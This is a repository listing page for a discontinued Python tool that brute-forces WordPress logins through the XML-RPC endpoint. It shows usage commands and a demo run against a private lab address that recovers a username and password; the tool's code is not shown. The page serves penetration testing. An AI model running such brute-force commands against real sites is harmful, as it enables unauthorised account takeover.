xmlrpc-bruteforcer icon indicating copy to clipboard operation
xmlrpc-bruteforcer copied to clipboard

Published 20 hours ago verified publisher icon kavishgr

Metadata

An XMLRPC brute forcer targeting Wordpress written in Python 3. (DISCONTINUED)

An XMLRPC BruteForcer for Wordpress - Inpired by (1N3@CrowdShield)

Note - This project is discontinued. No more updates will be provided! Sorry!

I switched to golang :-)

Fork it/do whatever you want with it.

Twitter - Telegram - Blog

Available in

Usage

python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt ( >>in progess<<)

Bugs

If you get an xml.etree.ElementTree.ParseError:

  • Did you forget to add 'xmlrpc' in the url ?
  • Try to add or remove 'https' or 'www'.

TODO

  • Exception Handling for xml.etree.ElementTree.ParseError
  • 'userlist' enumeration

Demo

MacBook-Pro: kavish$ python3 xmlrpcbruteforce.py http://192.168.100.34/xmlrpc.php 10k-most-common.txt elliot

---------------Examining Target--------------------

[>] Target is vulnerable.

--=[Target: http://192.168.100.34/xmlrpc.php]=--

        	[...Bruteforcing...]
--=[Tried: 1000 passwords]=--
--=[Tried: 2000 passwords]=--
--=[Tried: 3000 passwords]=--
--------------- BRUTEFORCE SUCCESSFULL  ---------------
--=[User found]=--
Login: elliot
Password: ER28-0652
--=[Exiting...]=--

Metadata

64
Stars
32
Forks
Watchers

Owner

verified publisher icon kavishgr

Metadata

An XMLRPC brute forcer targeting Wordpress written in Python 3. (DISCONTINUED)

Back